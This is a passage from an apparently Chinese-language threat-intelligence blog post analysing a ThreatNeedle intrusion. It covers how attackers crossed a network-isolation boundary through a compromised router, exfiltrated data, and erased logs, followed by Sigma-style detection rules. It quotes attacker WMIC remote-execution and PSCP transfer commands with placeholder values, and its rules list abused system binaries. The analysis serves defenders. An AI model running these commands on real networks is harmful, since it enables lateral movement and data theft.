2&gt;&amp;1\"<\/pre>\n<p>\u63a5\u4e0b\u6765\uff0c\u8be5\u884c\u4e3a\u4eba\u4f7f\u7528Windows Management Instrumentation Command-line\uff08WMIC\uff09\u5c06\u6076\u610f\u8f6f\u4ef6\u590d\u5236\u5230\u8fdc\u7a0b\u4e3b\u673a\u5e76\u542f\u52a8\u3002<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">wmic.exe \/node:[IP address] \/user:\"[user name]\" \/password:\"[password]\" PROCESS CALL CREATE \"cmd.exe \/c $appdata\\Adobe\\adobe.bat\"\r\nwmic.exe \/node:[IP address] \/user:\"[user name]\" \/password:\"[password]\" PROCESS CALL CREATE \"cmd \/c sc queryex helpsvc &gt; $temp\\tmp001.dat\"<\/pre>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u4e5d\u3001\u7a81\u7834\u7f51\u7edc\u9694\u79bb\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-1pc0yOWY\"><span class=\"ez-toc-section\" id=\"%E4%B9%9D%E3%80%81%E7%AA%81%E7%A0%B4%E7%BD%91%E7%BB%9C%E9%9A%94%E7%A6%BB\"><\/span>\u4e5d\u3001\u7a81\u7834\u7f51\u7edc\u9694\u79bb<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p 
data-diff-id=\"ct-diff-id-inNggsXz\">\u88ab\u653b\u51fb\u7684\u4f01\u4e1a\u7f51\u7edc\u88ab\u5206\u4e3a\u4e24\u4e2a\u90e8\u5206\uff1a\u516c\u53f8\u7f51\u7edc\uff08\u53ef\u4ee5\u8bbf\u95ee\u4e92\u8054\u7f51\uff09\u548c\u9650\u5236\u6027\u7f51\u7edc\uff08\u5b58\u653e\u654f\u611f\u6570\u636e\uff0c\u4e0d\u80fd\u8bbf\u95ee\u4e92\u8054\u7f51\uff09\u3002\u6839\u636e\u4f01\u4e1a\u653f\u7b56\uff0c\u8fd9\u4e24\u4e2a\u90e8\u5206\u4e4b\u95f4\u4e0d\u5141\u8bb8\u4f20\u8f93\u4fe1\u606f\u3002\u6362\u53e5\u8bdd\u8bf4\uff0c\u8fd9\u4e24\u4e2a\u90e8\u5206\u662f\u8981\u5b8c\u5168\u5206\u5f00\u7684\u3002<\/p>\n<p data-diff-id=\"ct-diff-id-Grjh99uG\">\u4f46\u5728\u88ab\u653b\u51fb\u7684\u673a\u5668\u4e2d\uff0c\u6709\u8be5\u4f01\u4e1aIT\u57fa\u7840\u8bbe\u65bd\u7684\u7ba1\u7406\u5458\u4f7f\u7528\u7684\u673a\u5668\u3002\u503c\u5f97\u6ce8\u610f\u7684\u662f\uff0c\u7ba1\u7406\u5458\u53ef\u4ee5\u540c\u65f6\u8fde\u63a5\u5230\u516c\u53f8\u548c\u53d7\u9650\u7f51\u6bb5\uff0c\u4ee5\u7ef4\u62a4\u7cfb\u7edf\u5e76\u4e3a\u7528\u6237\u63d0\u4f9b\u4e24\u4e2a\u533a\u57df\u7684\u6280\u672f\u652f\u6301\u3002\u56e0\u6b64\uff0c\u901a\u8fc7\u83b7\u5f97\u5bf9\u7ba1\u7406\u5458\u5de5\u4f5c\u7ad9\u7684\u63a7\u5236\uff0c\u653b\u51fb\u8005\u80fd\u591f\u8bbf\u95ee\u53d7\u9650\u7f51\u6bb5\u3002\u7136\u800c\uff0c\u7531\u4e8e\u5728\u7f51\u6bb5\u4e4b\u95f4\u76f4\u63a5\u8def\u7531\u6d41\u91cf\u662f\u4e0d\u53ef\u80fd\u7684\uff0c\u653b\u51fb\u8005\u65e0\u6cd5\u4f7f\u7528\u4ed6\u4eec\u7684\u6807\u51c6\u6076\u610f\u8f6f\u4ef6\u96c6\u5c06\u6570\u636e\u4ece\u53d7\u9650\u7f51\u6bb5\u6e17\u51fa\u5230C2\u3002 
\u60c5\u51b5\u57287\u67082\u65e5\u53d1\u751f\u4e86\u53d8\u5316\uff0c\u653b\u51fb\u8005\u6210\u529f\u5730\u83b7\u5f97\u4e86\u7ba1\u7406\u5458\u7528\u6765\u8fde\u63a5\u4e24\u4e2a\u7f51\u6bb5\u7cfb\u7edf\u7684\u8def\u7531\u5668\u7684\u51ed\u8bc1\u3002\u8def\u7531\u5668\u662f\u4e00\u4e2a\u8fd0\u884cCentOS\u7684\u865a\u62df\u673a\uff0c\u6839\u636e\u9884\u5b9a\u4e49\u7684\u89c4\u5219\u5728\u51e0\u4e2a\u7f51\u7edc\u63a5\u53e3\u4e4b\u95f4\u8def\u7531\u6d41\u91cf\u3002<\/p>\n<p data-diff-id=\"ct-diff-id-Grjh99uG\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-801\" title=\"b4cf7c787721010337b2ee2c9f1472d1\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b4cf7c787721010337b2ee2c9f1472d1.png\" alt=\"b4cf7c787721010337b2ee2c9f1472d1\" width=\"1556\" height=\"784\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b4cf7c787721010337b2ee2c9f1472d1.png 1556w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b4cf7c787721010337b2ee2c9f1472d1-768x387.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b4cf7c787721010337b2ee2c9f1472d1-1536x774.png 1536w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b4cf7c787721010337b2ee2c9f1472d1-1170x590.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b4cf7c787721010337b2ee2c9f1472d1-585x295.png 585w\" sizes=\"auto, (max-width: 1556px) 100vw, 1556px\" \/><\/p>\n<blockquote>\n<p data-diff-id=\"ct-diff-id-Grjh99uG\">\u6b64\u5904\u7f3a\u5931\u4e86\u653b\u51fb\u8005\u662f\u5982\u4f55\u83b7\u53d6\u5230router\u7ba1\u7406\u9875\u9762\u51ed\u636e\u7684\u7ec6\u8282\uff0c\u4f46\u731c\u6d4b\u662f\u56e0\u4e3a\u63a7\u5236\u4e86IT\u7ba1\u7406\u5458\u7684\u673a\u5668\uff0cdump\u4e86\u6d4f\u89c8\u5668\u51ed\u636e\u3002<\/p>\n<\/blockquote>\n<p data-diff-id=\"ct-diff-id-CDuH4T6o\">\u6839\u636e\u6536\u96c6\u5230\u7684\u8bc1\u636e\uff0c\u653b\u51fb\u8005\u626b\u63cf\u4e86\u8def\u7531\u5668\u7684\u7aef\u53e3\uff0c\u53d1\u73b0\u4e86\u4e00\u4e2aWebmin\u754c\u9762\u3002 
\u63a5\u4e0b\u6765\uff0c\u653b\u51fb\u8005\u4f7f\u7528\u4e00\u4e2a\u7279\u6743root\u8d26\u6237\u767b\u5f55\u5230Web\u754c\u9762\u3002\u76ee\u524d\u8fd8\u4e0d\u77e5\u9053\u653b\u51fb\u8005\u662f\u5982\u4f55\u83b7\u5f97\u8be5\u8d26\u6237\u7684\u51ed\u8bc1\u7684\uff0c\u4f46\u6709\u53ef\u80fd\u8be5\u51ed\u8bc1\u88ab\u4fdd\u5b58\u5728\u53d7\u611f\u67d3\u7cfb\u7edf\u7684\u4e00\u4e2a\u6d4f\u89c8\u5668\u5bc6\u7801\u7ba1\u7406\u5668\u4e2d\u3002<\/p>\n<p data-diff-id=\"ct-diff-id-Ok5Q55HQ\">\u653b\u51fb\u8005\u767b\u5165\u865a\u62df\u8def\u7531\u5668\uff1a<\/p>\n<p data-diff-id=\"ct-diff-id-Ok5Q55HQ\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-802\" title=\"41baf470a380cba0daf3206ec6afa6b0\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/41baf470a380cba0daf3206ec6afa6b0.png\" alt=\"41baf470a380cba0daf3206ec6afa6b0\" width=\"1672\" height=\"450\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/41baf470a380cba0daf3206ec6afa6b0.png 1672w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/41baf470a380cba0daf3206ec6afa6b0-768x207.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/41baf470a380cba0daf3206ec6afa6b0-1536x413.png 1536w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/41baf470a380cba0daf3206ec6afa6b0-1170x315.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/41baf470a380cba0daf3206ec6afa6b0-585x157.png 585w\" sizes=\"auto, (max-width: 1672px) 100vw, 1672px\" \/><\/p>\n<p data-diff-id=\"ct-diff-id-Ok5Q55HQ\">\u901a\u8fc7\u8fdb\u5165\u914d\u7f6e\u9762\u677f\uff0c\u653b\u51fb\u8005\u914d\u7f6e\u4e86Apache\u7f51\u7edc\u670d\u52a1\u5668\uff0c\u5e76\u5f00\u59cb\u4f7f\u7528\u8def\u7531\u5668\u4f5c\u4e3a\u8be5\u7ec4\u7ec7\u7684\u4f01\u4e1a\u7f51\u6bb5\u4e0e\u53d7\u9650\u7f51\u6bb5\u4e4b\u95f4\u7684\u4ee3\u7406\u670d\u52a1\u5668\u3002<\/p>\n<blockquote>\n<p data-diff-id=\"ct-diff-id-Ok5Q55HQ\">\u731c\u6d4b\u662f\u901a\u8fc7apache\u914d\u7f6e\u4e86\u6b63\u5411HTTP\u4ee3\u7406\u3002<\/p>\n<\/blockquote>\n<p 
data-diff-id=\"ct-diff-id-Ok5Q55HQ\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-803\" title=\"bcdeeda8b942d61ad83970e3a7237fe1\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/bcdeeda8b942d61ad83970e3a7237fe1.png\" alt=\"bcdeeda8b942d61ad83970e3a7237fe1\" width=\"1380\" height=\"522\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/bcdeeda8b942d61ad83970e3a7237fe1.png 1380w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/bcdeeda8b942d61ad83970e3a7237fe1-768x291.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/bcdeeda8b942d61ad83970e3a7237fe1-1170x443.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/bcdeeda8b942d61ad83970e3a7237fe1-585x221.png 585w\" sizes=\"auto, (max-width: 1380px) 100vw, 1380px\" \/><\/p>\n<blockquote>\n<p data-diff-id=\"ct-diff-id-Ok5Q55HQ\">\u6b64\u5904\u7f3a\u5931\u653b\u51fb\u8005\u5982\u4f55\u83b7\u77e5SSH\u5bc6\u7801\u7684\u7ec6\u8282\uff0c\u63a8\u6d4b\u548cweb\u51ed\u636e\u4e00\u81f4\uff0c\u6216web\u754c\u9762\u53ef\u914d\u7f6essh\u670d\u52a1\u3002<\/p>\n<\/blockquote>\n<p data-diff-id=\"ct-diff-id-g611oleo\">\u6b64\u540e\u6570\u5929\uff0c\u53732020\u5e747\u670810\u65e5\uff0c\u653b\u51fb\u8005\u901a\u8fc7SSH\u8fde\u63a5\u5230\u8def\u7531\u5668\uff0c\u5728\u5176\u4e2d\u4e00\u53f0\u88ab\u611f\u67d3\u7684\u673a\u5668\u4e0a\u8bbe\u7f6e\u4e86PuTTY PSCP\uff08PuTTY\u5b89\u5168\u62f7\u8d1d\u5ba2\u6237\u7aef\uff09\u5de5\u5177\u3002\u8fd9\u4e2a\u5de5\u5177\u88ab\u7528\u6765\u4e0a\u4f20\u6076\u610f\u8f6f\u4ef6\u5230\u8def\u7531\u5668\u7684\u865a\u62df\u673a\u3002\u8fd9\u4f7f\u653b\u51fb\u8005\u80fd\u591f\u5c06\u6076\u610f\u8f6f\u4ef6\u653e\u7f6e\u5728\u4f01\u4e1a\u7f51\u7edc\u7684\u9650\u5236\u6027\u90e8\u5206\u7684\u7cfb\u7edf\u4e0a\uff0c\u4f7f\u7528\u8def\u7531\u5668\u6765\u6258\u7ba1\u6076\u610f\u6837\u672c
\u3002\u6b64\u5916\uff0c\u5728\u7f51\u7edc\u9650\u5236\u533a\u6bb5\u8fd0\u884c\u7684\u6076\u610f\u8f6f\u4ef6\u80fd\u591f\u901a\u8fc7\u8bbe\u7f6e\u5728\u540c\u4e00\u53f0\u8def\u7531\u5668\u4e0a\u7684Apache\u670d\u52a1\u5668\u5c06\u6536\u96c6\u5230\u7684\u6570\u636e\u5916\u6cc4\u5230\u547d\u4ee4\u548c\u63a7\u5236\u670d\u52a1\u5668\u3002<\/p>\n<p data-diff-id=\"ct-diff-id-mIoZKKMO\">\u653b\u51fb\u8005\u5165\u4fb5\u865a\u62df\u8def\u7531\u5668\u540e\u7684\u65b0\u7684\u8fde\u63a5\u62d3\u6251\u56fe\uff1a<\/p>\n<p data-diff-id=\"ct-diff-id-mIoZKKMO\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-804\" title=\"edb7792577adfc9aef907b8f1be2e249\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/edb7792577adfc9aef907b8f1be2e249.png\" alt=\"edb7792577adfc9aef907b8f1be2e249\" width=\"1554\" height=\"788\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/edb7792577adfc9aef907b8f1be2e249.png 1554w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/edb7792577adfc9aef907b8f1be2e249-768x389.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/edb7792577adfc9aef907b8f1be2e249-1536x779.png 1536w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/edb7792577adfc9aef907b8f1be2e249-1170x593.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/edb7792577adfc9aef907b8f1be2e249-585x297.png 585w\" sizes=\"auto, (max-width: 1554px) 100vw, 1554px\" \/><\/p>\n<p data-diff-id=\"ct-diff-id-mIoZKKMO\">\u5728\u9694\u79bb\u533a\u57df\u7684\u6076\u610f\u8f6f\u4ef6\u6837\u672c\uff0c\u5176\u4e2d\u6709\u4f5c\u4e3a\u4ee3\u7406\u670d\u52a1\u5668\u4f7f\u7528\u7684\u8def\u7531\u5668\u7684\u786c\u7f16\u7801URL\uff1a<\/p>\n<p data-diff-id=\"ct-diff-id-mIoZKKMO\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-805\" title=\"a07e84b22fd7d3921695ba36d3e2a0ca\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/a07e84b22fd7d3921695ba36d3e2a0ca.png\" alt=\"a07e84b22fd7d3921695ba36d3e2a0ca\" width=\"1670\" 
height=\"302\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/a07e84b22fd7d3921695ba36d3e2a0ca.png 1670w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/a07e84b22fd7d3921695ba36d3e2a0ca-768x139.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/a07e84b22fd7d3921695ba36d3e2a0ca-1536x278.png 1536w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/a07e84b22fd7d3921695ba36d3e2a0ca-1170x212.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/a07e84b22fd7d3921695ba36d3e2a0ca-585x106.png 585w\" sizes=\"auto, (max-width: 1670px) 100vw, 1670px\" \/><\/p>\n<p data-diff-id=\"ct-diff-id-mIoZKKMO\">\u653b\u51fb\u8005\u5728centos\u8def\u7531\u5668\u4e0a\u7ecf\u5e38\u5220\u9664\u65e5\u5fd7\uff1a<\/p>\n<p data-diff-id=\"ct-diff-id-mIoZKKMO\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-806\" title=\"4adcd14914f764902564a99e368122e0\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/4adcd14914f764902564a99e368122e0.png\" alt=\"4adcd14914f764902564a99e368122e0\" width=\"471\" height=\"260\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/4adcd14914f764902564a99e368122e0.png 634w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/4adcd14914f764902564a99e368122e0-585x323.png 585w\" sizes=\"auto, (max-width: 471px) 100vw, 471px\" \/><\/p>\n<p data-diff-id=\"ct-diff-id-mIoZKKMO\">\u653b\u51fb\u8005\u8fd8\u5728\u8def\u7531\u5668\u865a\u62df\u673a\u4e0a\u8fd0\u884c\u4e86nmap\u5de5\u5177\uff0c\u5e76\u626b\u63cf\u4e86\u4f01\u4e1a\u7f51\u7edc\u9650\u5236\u6bb5\u5185\u7cfb\u7edf\u7684\u7aef\u53e3\u30029\u670827\u65e5\uff0c\u653b\u51fb\u8005\u5f00\u59cb\u4ece\u8def\u7531\u5668\u4e0a\u6e05\u9664\u4ed6\u4eec\u6d3b\u52a8\u7684\u6240\u6709\u75d5\u8ff9\uff0c\u4f7f\u7528 logrotate\u5de5\u5177\u6765\u8bbe\u7f6e\u81ea\u52a8\u5220\u9664\u65e5\u5fd7\u6587\u4ef6\u3002<\/p>\n<h1 id=\"id-\u5341\u3001\u6570\u636e\u6e17\u51fa\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-4yOw7aJE\"><img loading=\"lazy\" decoding=\"async\" 
class=\"alignnone size-full wp-image-808\" title=\"b29c83e92381b84caeaa74a09e3a5134\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b29c83e92381b84caeaa74a09e3a5134.png\" alt=\"b29c83e92381b84caeaa74a09e3a5134\" width=\"1666\" height=\"272\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b29c83e92381b84caeaa74a09e3a5134.png 1666w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b29c83e92381b84caeaa74a09e3a5134-768x125.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b29c83e92381b84caeaa74a09e3a5134-1536x251.png 1536w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b29c83e92381b84caeaa74a09e3a5134-1170x191.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b29c83e92381b84caeaa74a09e3a5134-585x96.png 585w\" sizes=\"auto, (max-width: 1666px) 100vw, 1666px\" \/><\/h1>\n<p>&nbsp;<\/p>\n<h1 class=\"ct-heading\" data-diff-id=\"ct-diff-id-4yOw7aJE\"><span class=\"ez-toc-section\" id=\"%E5%8D%81%E3%80%81%E6%95%B0%E6%8D%AE%E6%B8%97%E5%87%BA\"><\/span>\u5341\u3001\u6570\u636e\u6e17\u51fa<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>\u653b\u51fb\u8005\u8bd5\u56fe\u4ece\u51e0\u4e2a\u88ab\u63a7\u5236\u7684\u670d\u52a1\u5668\u4e3b\u673a\u521b\u5efaSSH\u96a7\u9053\u5230\u4f4d\u4e8e\u97e9\u56fd\u7684\u8fdc\u7a0b\u670d\u52a1\u5668\u3002\u4ed6\u4eec\u4f7f\u7528\u4e00\u4e2a\u5b9a\u5236\u7684\u96a7\u9053\u5de5\u5177\u6765\u5b9e\u73b0\u8fd9\u4e00\u76ee\u7684\u3002\u8be5\u5de5\u5177\u63a5\u6536\u56db\u4e2a\u53c2\u6570\uff1a\u5ba2\u6237\u7aefIP\u5730\u5740\u3001\u5ba2\u6237\u7aef\u7aef\u53e3\u3001\u670d\u52a1\u5668IP\u5730\u5740\u548c\u670d\u52a1\u5668\u7aef\u53e3\u3002\u8be5\u5de5\u5177\u63d0\u4f9b\u57fa\u672c\u529f\u80fd\uff0c\u5c06\u5ba2\u6237\u7aef\u6d41\u91cf\u8f6c\u53d1\u5230\u670d\u52a1\u5668\u3002\u4e3a\u4e86\u907f\u514d\u660e\u6587\u4f20\u8f93\uff0c\u4f7f\u7528\u4e86\u5f02\u6216\uff08XOR\uff09\u52a0\u5bc6\u901a\u8baf\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-807\" 
title=\"8abc10b86e01e8451dbc4d071fe56476\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8abc10b86e01e8451dbc4d071fe56476.png\" alt=\"8abc10b86e01e8451dbc4d071fe56476\" width=\"560\" height=\"296\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8abc10b86e01e8451dbc4d071fe56476.png 942w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8abc10b86e01e8451dbc4d071fe56476-768x406.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8abc10b86e01e8451dbc4d071fe56476-585x309.png 585w\" sizes=\"auto, (max-width: 560px) 100vw, 560px\" \/><\/p>\n<p>\u4f7f\u7528 PuTTy PSCP\u8fdc\u7a0b\u4f20\u8f93\u6587\u4ef6\uff1a<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">%APPDATA%\\PBL\\unpack.tmp -pw [password] root@[IP address]:\/tmp\/cab0215 %APPDATA%\\PBL\\cab0215.tmp<\/pre>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u68c0\u6d4b\u4e0e\u9632\u5fa1\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-TFgwcPru\"><span class=\"ez-toc-section\" id=\"%E6%A3%80%E6%B5%8B%E4%B8%8E%E9%98%B2%E5%BE%A1\"><\/span>\u68c0\u6d4b\u4e0e\u9632\u5fa1<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<blockquote><p><strong><span data-size=\"19\">\u76ee\u6807\u662f\u68c0\u6d4b\u653b\u51fb\u65b9\u6cd5\u672c\u8eab\uff0c\u800c\u4e0d\u662f\u7279\u5b9a\u7684IoC\u3002<\/span><\/strong><\/p><\/blockquote>\n<h5 data-diff-id=\"ct-diff-id-277kkItY\"><span class=\"ez-toc-section\" id=\"1%E3%80%81%E9%82%AE%E4%BB%B6%E6%B2%99%E7%AE%B1%E5%AF%B9%E4%BA%8E%E5%AE%8F%E6%96%87%E6%A1%A3%E7%9A%84%E6%A3%80%E6%B5%8B\"><\/span>1\u3001\u90ae\u4ef6\u6c99\u7bb1\u5bf9\u4e8e\u5b8f\u6587\u6863\u7684\u68c0\u6d4b<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<h5 data-diff-id=\"ct-diff-id-2UbDpNWF\"><span class=\"ez-toc-section\" 
id=\"2%E3%80%81%E9%92%93%E9%B1%BC%E6%96%87%E6%A1%A3%E5%9C%A8%E5%8F%97%E5%AE%B3%E8%80%85%E7%94%B5%E8%84%91%E4%B8%8A%E6%89%A7%E8%A1%8C%E7%9A%84%E8%A1%8C%E4%B8%BA\"><\/span>2\u3001\u9493\u9c7c\u6587\u6863\u5728\u53d7\u5bb3\u8005\u7535\u8111\u4e0a\u6267\u884c\u7684\u884c\u4e3a<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<div class=\"penci-tpadding-2\">\n<h6 data-diff-id=\"ct-diff-id-xVdmdxjl\"><span class=\"ez-toc-section\" id=\"1%EF%BC%89%E5%90%AF%E5%8A%A8%E7%9B%AE%E5%BD%95%E5%88%9B%E5%BB%BA%E6%96%87%E4%BB%B6\"><\/span>1\uff09\u542f\u52a8\u76ee\u5f55\u521b\u5efa\u6587\u4ef6<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<p data-diff-id=\"ct-diff-id-xVdmdxjl\">\u901a\u8fc7word\u6587\u6863\u521b\u5efa\u6587\u4ef6\u5c5e\u4e8e\u53ef\u7591\u884c\u4e3a\uff0c\u4f46\u7531\u4e8eLNK\u6587\u4ef6\u7684\u7279\u6b8a\u6027\uff0csysmon\u65e0\u6cd5\u76f4\u63a5\u91c7\u96c6\u5230LNK\u6587\u4ef6\u7684\u521b\u5efa\uff0c\u4f46\u76f8\u5173\u573a\u666f\u4ecd\u9700\u8986\u76d6\uff1a<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># \u9493\u9c7c\u6587\u6863\u521b\u5efa\u53ef\u7591\u6587\u4ef6\r\ndetection:\r\n    event:\r\n        event_id: '11'\r\n    selection1:\r\n        event_data.Image:\r\n            - '*\\winword.exe'\r\n            - '*\\excel.exe'\r\n            - '*\\powerpnt.exe'\r\n            - '*\\outlook.exe'\r\n            - '*\\MSPUB.exe'\r\n            - '*\\VISIO.exe'\r\n    selection2:\r\n        event_data.TargetFilename:\r\n            - '*.bat'\r\n            - '*.vbs'\r\n            - '*.vb'\r\n    condition: event and selection1 and selection2<\/pre>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># Windows\u81ea\u542f\u52a8\u76ee\u5f55\u65b0\u589e\u6587\u4ef6\r\ndetection:\r\n    selection1:\r\n        EventID: 11\r\n    selection2:\r\n        TargetFilename:\r\n            - 'C:*?Microsoft?Windows?Start Menu?Programs?StartUp?*'\r\n    whitelist1:\r\n        Image:\r\n            - 'C:?windows?explorer.exe'\r\n    
whitelist2:\r\n        TargetFilename:\r\n            - '*appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini'\r\n    condition:  selection1 and selection2 and not whitelist1 and not whitelist2<\/pre>\n<h6 data-diff-id=\"ct-diff-id-j6FfGneX\"><span class=\"ez-toc-section\" id=\"2%EF%BC%89%E5%AD%90%E8%BF%9B%E7%A8%8B%E8%BF%90%E8%A1%8Crundll32\"><\/span>2\uff09\u5b50\u8fdb\u7a0b\u8fd0\u884crundll32<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"># \u9493\u9c7c\u6587\u6863\u8fd0\u884c\u53ef\u7591\u5b50\u8fdb\u7a0b\r\ndetection:\r\n    event:\r\n        EventID: 1\r\n    selection1:\r\n        event_data.ParentImage:\r\n            - '*\\winword.exe'\r\n            - '*\\excel.exe'\r\n            - '*\\powerpnt.exe'\r\n            - '*\\outlook.exe'\r\n            - '*\\MSPUB.exe'\r\n            - '*\\VISIO.exe'\r\n    selection2:\r\n        event_data.OriginalFileName:\r\n            - 'cmd.exe'\r\n            - 'powershell.exe'\r\n            - 'wmic.exe'\r\n            - 'regsvr32.exe'\r\n            - 'psexec.c'\r\n            - 'bitsadmin.exe'\r\n            - 'wmiprvse.exe'\r\n            - 'cmstp.exe'\r\n            - 'InstallUtil.exe'\r\n            - 'MSBuild.exe'\r\n            - 'mshta.exe'\r\n            - 'sdbinst.exe'\r\n            - 'certutil.exe'\r\n            - 'conhost.exe'\r\n            - 'rundll32.exe'\r\n            - 'cscript.exe'\r\n            - 'sctasks.exe'\r\n            - 'wscript.exe'\r\n            - 'scriptrunner.exe'\r\n            - 'svchost.exe'\r\n            - 'forfiles.exe'\r\n            - 'scrcons'\r\n            # - 'msiexec.exe'  # office\u5b89\u88c5\u66f4\u65b0\u5305\u4f1a\u51fa\u73b0\u8fd9\u79cd\u60c5\u51b5\r\n    selection3:\r\n        event_data.CommandLine:\r\n            - '*http:\/\/*'\r\n            - '*https:\/\/*'\r\n    filter1:\r\n        event_data.OriginalFileName:\r\n            - 'chrome.exe'\r\n    filter2:\r\n     
   event_data.Description:\r\n            - '*\u6d4f\u89c8\u5668*'\r\n            - '*browser*'\r\n    filter3:\r\n        event_data.CommandLine:\r\n            - '*rundll32*pptassist.dll,dllcheckupdate*'\r\n            - '*\\spool\\*'\r\n            - '*pptassist.dll*'\r\n            - '*dllsendreportdataw*'\r\n            - '*rundll32*control_rundll*'\r\n            - '*.microsoft.com\/*'\r\n            - '*\\edge\\*'\r\n            - '*\\maxthon*'\r\n            - '*\\internet explorer*'\r\n            - '*officetemplate*'\r\n            - '*\\kismain.exe*'\r\n            - '*dispatchapicall*'\r\n            - '*wmic bios get SerialNumber*'\r\n            - '*PhotoViewer.dll*'\r\n            - '*:@*'\r\n    filter4:\r\n        event_data.ParentCommandLine:\r\n            - '* \/dde'\r\n    filter5:\r\n        event_data.Image:\r\n            - '*firefox*'\r\n    condition: event and selection1 and (selection2 or selection3) and not filter1 and not filter2 and not filter3 and not filter4 and not filter5<\/pre>\n<\/div>\n<h5 data-diff-id=\"ct-diff-id-RHcIDjz5\"><span class=\"ez-toc-section\" id=\"3%E3%80%81ThreatNeedle_Installer%E7%9A%84%E8%A1%8C%E4%B8%BA\"><\/span>3\u3001ThreatNeedle Installer\u7684\u884c\u4e3a<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<div class=\"penci-tpadding-2\">\n<h6 data-diff-id=\"ct-diff-id-ZDVi1Bod\"><span class=\"ez-toc-section\" id=\"1%EF%BC%89%E6%B3%A8%E5%86%8C%E7%B3%BB%E7%BB%9F%E6%9C%8D%E5%8A%A1%E5%AE%9E%E7%8E%B0%E6%8C%81%E4%B9%85%E5%8C%96\"><\/span>1\uff09\u6ce8\u518c\u7cfb\u7edf\u670d\u52a1\u5b9e\u73b0\u6301\u4e45\u5316<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<h6 data-diff-id=\"ct-diff-id-BhglAet6\"><span class=\"ez-toc-section\" id=\"2%EF%BC%89%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E5%86%99%E5%85%A5%E5%88%B0%E6%B3%A8%E5%86%8C%E8%A1%A8\"><\/span>2\uff09\u914d\u7f6e\u4fe1\u606f\u5199\u5165\u5230\u6ce8\u518c\u8868<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<\/div>\n<h5 
